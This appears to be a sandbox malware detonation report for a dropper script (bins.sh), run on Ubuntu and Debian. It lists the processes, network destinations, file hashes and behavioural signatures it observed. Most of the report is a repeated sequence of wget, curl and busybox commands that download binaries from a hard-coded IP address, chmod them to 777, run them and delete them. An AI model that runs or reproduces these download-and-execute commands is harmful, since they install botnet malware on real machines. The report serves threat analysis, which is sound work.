[/bin/busybox wget http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/bin/chmod
[chmod 777 me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17
[./me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/bin/rm
[rm me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/usr/bin/wget
[wget http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/bin/chmod
[chmod 777 GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF
[./GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/bin/rm
[rm GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/usr/bin/wget
[wget http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/bin/chmod
[chmod 777 JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug
[./JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/bin/rm
[rm JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-20 02:45
Reported
2024-11-20 02:48
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
30s
Max time network
131s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 | /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 | N/A |
| N/A | /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 | /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 | N/A |
| N/A | /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX | /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX | N/A |
| N/A | /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW | /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW | N/A |
| N/A | /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI | /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI | N/A |
| N/A | /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE | /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE | N/A |
| N/A | /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC | /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC | N/A |
| N/A | /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz | /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz | N/A |
| N/A | /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 | /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 | N/A |
| N/A | /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV | /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV | N/A |
| N/A | /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 | /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 | N/A |
| N/A | /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 | /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 | N/A |
| N/A | /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF | /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF | N/A |
| N/A | /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug | /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug | /usr/bin/curl | N/A |
Processes
/tmp/5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518.sh
[/tmp/5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/bin/chmod
[chmod 777 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
[./25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/bin/rm
[rm 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/usr/bin/wget
[wget http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/bin/chmod
[chmod 777 UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5
[./UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/bin/rm
[rm UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/usr/bin/wget
[wget http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/bin/chmod
[chmod 777 Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX
[./Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/bin/rm
[rm Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/usr/bin/wget
[wget http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/bin/chmod
[chmod 777 kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW
[./kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/bin/rm
[rm kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/usr/bin/wget
[wget http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/bin/chmod
[chmod 777 l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI
[./l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/bin/rm
[rm l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/usr/bin/wget
[wget http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/bin/chmod
[chmod 777 6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE
[./6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/bin/rm
[rm 6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/usr/bin/wget
[wget http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/bin/chmod
[chmod 777 U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC
[./U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/bin/rm
[rm U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/usr/bin/wget
[wget http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/bin/chmod
[chmod 777 vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz
[./vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/bin/rm
[rm vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/usr/bin/wget
[wget http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/bin/chmod
[chmod 777 zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6
[./zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/bin/rm
[rm zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/usr/bin/wget
[wget http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/bin/chmod
[chmod 777 idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV
[./idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/bin/rm
[rm idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/usr/bin/wget
[wget http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/bin/chmod
[chmod 777 p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783
[./p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/bin/rm
[rm p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/usr/bin/wget
[wget http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/bin/chmod
[chmod 777 me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17
[./me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/bin/rm
[rm me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/usr/bin/wget
[wget http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/bin/chmod
[chmod 777 GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF
[./GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/bin/rm
[rm GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/usr/bin/wget
[wget http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/bin/chmod
[chmod 777 JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug
[./JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/bin/rm
[rm JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 151.101.1.91:443 | | tcp |
| GB | 195.181.164.14:443 | | tcp |
| GB | 185.125.188.62:443 | | tcp |
Files
/tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-20 02:45
Reported
2024-11-20 02:48
Platform
debian9-armhf-20240611-en
Max time kernel
30s
Max time network
34s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 | /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 | N/A |
| N/A | /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 | /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 | N/A |
| N/A | /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX | /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX | N/A |
| N/A | /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW | /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW | N/A |
| N/A | /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI | /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI | N/A |
| N/A | /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE | /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE | N/A |
| N/A | /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC | /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC | N/A |
| N/A | /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz | /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz | N/A |
| N/A | /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 | /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 | /usr/bin/curl | N/A |
Processes
/tmp/5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518.sh
[/tmp/5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/bin/chmod
[chmod 777 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
[./25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/bin/rm
[rm 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/usr/bin/wget
[wget http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/bin/chmod
[chmod 777 UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5
[./UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/bin/rm
[rm UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/usr/bin/wget
[wget http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/bin/chmod
[chmod 777 Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX
[./Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/bin/rm
[rm Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/usr/bin/wget
[wget http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/bin/chmod
[chmod 777 kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW
[./kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/bin/rm
[rm kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/usr/bin/wget
[wget http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/bin/chmod
[chmod 777 l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI
[./l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/bin/rm
[rm l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/usr/bin/wget
[wget http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/bin/chmod
[chmod 777 6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE
[./6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/bin/rm
[rm 6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/usr/bin/wget
[wget http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/bin/chmod
[chmod 777 U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC
[./U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/bin/rm
[rm U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/usr/bin/wget
[wget http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/bin/chmod
[chmod 777 vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz
[./vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/bin/rm
[rm vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/usr/bin/wget
[wget http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/bin/chmod
[chmod 777 zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6
[./zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/bin/rm
[rm zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/usr/bin/wget
[wget http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |